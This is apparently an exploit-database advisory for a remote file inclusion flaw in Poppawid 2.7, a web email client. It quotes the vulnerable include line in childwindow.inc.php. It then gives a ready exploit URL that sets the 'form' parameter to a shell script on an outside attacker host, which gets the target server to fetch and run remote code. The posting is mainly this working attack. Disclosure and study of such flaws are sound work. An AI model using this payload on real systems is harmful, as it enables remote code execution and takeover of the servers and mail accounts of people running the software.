Poppawid 2.7 (form) Remote File Inclusion Vulnerability

=======================================================
Poppawid 2.7 (form) Remote File Inclusion Vulnerability
=======================================================



#Poppawid Remote File include
#f0und bY 0in
#Greetings to: All Dark-Coders Team Members
#IRC: #dark-coders at warszawa.irc.pl
#About:popper_mod-wid is a free (and popular), full featured web based email client
#Download:http://poppawid.sourceforge.net/
#No dork for script kiddies..;]
#Register_globals=On
#BUG:
poppawid/mail/childwindow.inc.php:33:                                   <?php include($form.".form.inc.php");?>
Expl0it:
http://x.com/[path]/mail/childwindow.inc.php?form=http://h4x0r.org/shell.txt?



#  0day.today [2018-02-19]  #